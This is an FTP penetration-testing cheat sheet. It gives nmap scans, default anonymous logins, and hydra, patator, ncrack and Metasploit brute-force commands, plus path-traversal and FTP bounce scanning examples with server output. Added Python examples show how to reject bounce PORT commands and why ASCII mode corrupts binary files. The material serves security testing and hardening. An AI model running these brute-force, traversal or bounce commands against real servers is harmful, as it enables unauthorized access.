Cheat sheet

Commands

  • Scanning
        nmap -Pn --disable-arp-ping -sV 192.168.99.24 -p21
  • Banner Grabbing
      nmap -Pn --disable-arp-ping -sV 192.168.99.24 -p21 --script=banner
      nc -nv 192.168.99.24 21  
      telnet 192.168.99.24 21
      openssl s_client -connect 192.168.99.24:21 -starttls ftp
  • Brute Forcing
         #Manual Anonymous Login Combos
         anonymous : anonymous
         anonymous :
         ftp : ftp
         
         msf > use auxiliary/scanner/ftp/anonymous
         msf > use auxiliary/scanner/ftp/ftp_login
         
         nmap --script=ftp-anon -p21 192.168.99.24
         nmap --script ftp-brute -p21 192.168.99.24
         
         patator ftp_login host=192.168.99.24 user=FILE0 password=FILE1 0=users  1=pass.txt tls=1 -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500 # SSL
         hydra -t 2 -L users -P pass.txt 192.168.99.24 -s 21 ftps #SSL         
         hydra -L users -P pass.txt 192.168.99.24 ftp -V
         
         ncrack -v -U users -P pass.txt ftp://192.168.99.24:21
         
  • Connecting with FTP client
    ftp ftp://ubuntu:123@192.168.99.24 # Username & Password 
    ftp ftp://anonymous:anonymous@192.168.99.24 # Anonymous 
     
    lftp
    lftp :~> set ftp:ssl-force true
    lftp :~> set ssl:verify-certificate no
    lftp :~> connect 192.168.99.24
    lftp 192.168.99.24:~> login ubuntu 123
    lftp ubuntu@192.168.99.24:~> ls
  • Mounting
    apt-get install curlftpfs
    curlftpfs ubuntu:123@192.168.99.24 my_ftp # If the server requires TLS, add -o ssl,no_verify_peer,no_verify_hostname
    curlftpfs -o allow_other ftp-user:ftp-pass@my-ftp-location.local /mnt/my_ftp/ # To allow other users
    fusermount -u my_ftp # unmount     
  • Downloading
    wget -m --no-passive-ftp ftps://ubuntu:123@192.168.99.24/ --no-check-certificate --reject '.vboxclient*'

Attacks

  • Path Traversal
    ftp ftp://ubuntu:123@192.168.99.24
    ftp> ls ../../../../
    -rwxrwxrwx   1 ftp      ftp            0 Sep 23  2015 AUTOEXEC.BAT
    -rw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 CONFIG.SYS
    .....
    226 File sent ok
  • FTP Bounce
    nmap -sV --script ftp-bounce -p21 10.10.x.x 
    nmap -v -p 21,22,445,80,443 -b username:password@172.19.0.100 192.168.0.1/24
     
    msf > use auxiliary/scanner/portscan/ftpbounce
     
    USER A
    331 Username okay, awaiting password
    PASS A
    230 User logged in, proceed
    PORT 172,19,0,100,0,1234
    200 The requested action has been successfully completed 
    LIST
    150 File status okay; about to open data connection // We understood port 1234 is open
    226 Closing data connection 
    PORT 172,19,0,100,0,4444
    200 The requested action has been successfully completed 
    LIST
    425 No connection established // We understood port 4444 is closed
    sequenceDiagram
        participant Attacker
        participant FTP server
        participant Target
        Attacker->>FTP server: PORT 172,19,0,100,0,1234
        FTP server-->>Target:  SYN+Port 1234
        Target-->> FTP server: SYN/ACK
        FTP server-->> Target: ACK
        FTP server ->> Attacker: 226 Transfer Complete
    
  • Random
sequenceDiagram
    participant User
    participant FTP Server
    User-->> FTP Server: Command Channel ( 21 ) 
    FTP Server -->> User: Data Transmission (20)

Passive

As hinted earlier, passive mode FTP is the more recent data connection mode. While older systems only support active mode, modern GUI-based or command-line FTP clients also support passive mode. Let’s now go over the simplified steps for establishing passive connections.

sequenceDiagram
    participant User
    participant FTP Server
    User-->> FTP Server: Command Channel ( 21 ) 
    User-->> FTP Server : Data Transmission (Random)
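Both the FTP Bounce section and the two data-channel diagrams come down to one field: the `h1,h2,h3,h4,p1,p2` host-port encoding that the client sends in PORT (active mode) and the server returns in the 227 reply to PASV (passive mode). The following is an added example, not code from the original page: it decodes and encodes that field, applies the server-side PORT policy that closes the bounce hole (the data address must be the client on the control connection, and an unprivileged port, which is what vsftpd's `port_promiscuous=NO` and ProFTPD's `AllowForeignAddress off` enforce), and the client-side mirror image for PASV, where a client ignores an advertised address that differs from the server it is talking to (current curl and lftp do this by default). One caveat on the transcript above: RFC 959 encodes the port as `p1*256+p2` with every field in 0..255, so port 1234 is written `4,210`; a field such as `0,1234` is a syntax error to a conforming server, and the checker treats it as one. Reply codes and texts follow RFC 959; the function names are this example's own.

```python
import ipaddress
import re

# 'h1,h2,h3,h4,p1,p2' as used by the PORT command and inside the 227 PASV reply (RFC 959).
HOSTPORT_RE = re.compile(r"(?<!\d)(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)(?!\d)")


def decode_hostport(text):
    """Return (dotted ip string, port) from a PORT argument or a 227 reply line."""
    m = HOSTPORT_RE.search(text)
    if m is None:
        raise ValueError("no h1,h2,h3,h4,p1,p2 field in %r" % text)
    fields = [int(x) for x in m.groups()]
    if any(f > 255 for f in fields):
        # every field is one octet: port 1234 is 4,210 (4*256+210), never 0,1234
        raise ValueError("field out of range in %r" % text)
    ip = str(ipaddress.IPv4Address(".".join(str(f) for f in fields[:4])))
    return ip, fields[4] * 256 + fields[5]


def encode_hostport(ip, port):
    """Inverse of decode_hostport, e.g. ('172.19.0.100', 1234) -> '172,19,0,100,4,210'."""
    octets = ",".join(str(o) for o in ipaddress.IPv4Address(ip).packed)
    return "%s,%d,%d" % (octets, port >> 8, port & 0xFF)


def check_port_command(argument, control_peer_ip):
    """Server-side PORT policy: accept only a data address that belongs to the
    client holding the control connection, on an unprivileged port.
    Returns the (code, text) reply the server would send."""
    try:
        ip, port = decode_hostport(argument)
    except ValueError:
        return 501, "Syntax error in parameters or arguments."
    if ipaddress.IPv4Address(ip) != ipaddress.IPv4Address(control_peer_ip):
        return 500, "Illegal PORT command."   # third-party target: this is the bounce case
    if port < 1024:
        return 500, "Illegal PORT command."   # would point the server at a service port
    return 200, "PORT command successful."


def pasv_data_endpoint(reply, server_ip):
    """Client-side check for passive mode: parse the 227 reply, but connect to the
    address the control channel already uses when the advertised one differs.
    Returns (ip_to_connect, port, advertised_matches)."""
    if not reply.startswith("227"):
        raise ValueError("not a PASV reply: %r" % reply)
    advertised, port = decode_hostport(reply)
    expected = str(ipaddress.IPv4Address(server_ip))
    if advertised != expected:
        return expected, port, False          # keep the data channel on the same host
    return advertised, port, True


if __name__ == "__main__":
    # Constructed exchange: the client at 192.168.99.50 asks for data on its own port 1234
    print(check_port_command(encode_hostport("192.168.99.50", 1234), "192.168.99.50"))
    # ... and then for a different host, which a hardened server refuses
    print(check_port_command("172,19,0,100,4,210", "192.168.99.50"))
    print(pasv_data_endpoint("227 Entering Passive Mode (192,168,99,24,195,80).", "192.168.99.24"))
```

The `ftp-bounce` NSE script and the `-b` option of nmap succeed only against servers that answer 200 to the second PORT above; on a server that answers 500 the scan reports nothing, so the server reply to a foreign-address PORT is the quickest thing to verify after hardening.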

WARNING

File upload (PUT FileName.exe) or download (GET FileName.txt; mget FileName.txt) operations can be performed after login. For a transferred file to arrive uncorrupted, the transfer mode must match the file: switch with the “binary” command if the file is in binary format, and with the “ascii” command if it is in ASCII format.
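Why the wrong mode corrupts a file: in TYPE A (the “ascii” command) both ends rewrite line endings to and from NVT CRLF, which silently changes any byte sequence that looks like one. The block below is an added illustration, not part of the original page. It simulates the Unix-to-Unix round trip of both modes in Python and runs it over the 16 bytes every PNG file starts with (the PNG signature was designed so that this very conversion is detectable); function names and the `recommend_type` heuristic are this example's own.

```python
import hashlib
import re

# The first 16 bytes of every PNG file: the signature (which contains CRLF and LF on
# purpose) followed by the IHDR chunk length 0x0000000D, whose last byte is a CR.
PNG_HEAD = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"


def to_nvt_ascii(data):
    """Sender side of TYPE A on a Unix host: every bare LF goes onto the wire as CRLF."""
    return re.sub(rb"(?<!\r)\n", b"\r\n", data)


def from_nvt_ascii(wire):
    """Receiver side of TYPE A on a Unix host: CRLF from the wire is stored as LF."""
    return wire.replace(b"\r\n", b"\n")


def simulate_transfer(data, type_code):
    """Bytes stored on the far side after a PUT/GET in TYPE I ('binary') or TYPE A ('ascii')."""
    if type_code == "I":
        return data                               # binary mode copies the bytes unchanged
    if type_code == "A":
        return from_nvt_ascii(to_nvt_ascii(data))
    raise ValueError("unknown TYPE %r" % type_code)


def survives(data, type_code):
    """The check to run after a transfer: hash before and after must agree."""
    before = hashlib.sha256(data).hexdigest()
    after = hashlib.sha256(simulate_transfer(data, type_code)).hexdigest()
    return before == after


TEXT_BYTES = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def recommend_type(data):
    """'A' only for plain 7-bit text; anything else (including UTF-8) is safest as 'I'."""
    return "A" if all(b in TEXT_BYTES for b in data) else "I"


if __name__ == "__main__":
    print("binary mode intact:", survives(PNG_HEAD, "I"))   # True
    print("ascii mode intact: ", survives(PNG_HEAD, "A"))   # False: CRLF and LF collapse
    print("stored bytes:", simulate_transfer(PNG_HEAD, "A"))
```

Text files written on Windows (CRLF) land on a Unix server with LF endings in ASCII mode, which is the one case the mode exists for; for everything else `binary` is the safe default, which is also why most modern clients start in binary mode.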

TIP

In addition, there is a file called /etc/ftpusers that we also need to pay attention to, as this file is used to deny certain users access to the FTP service.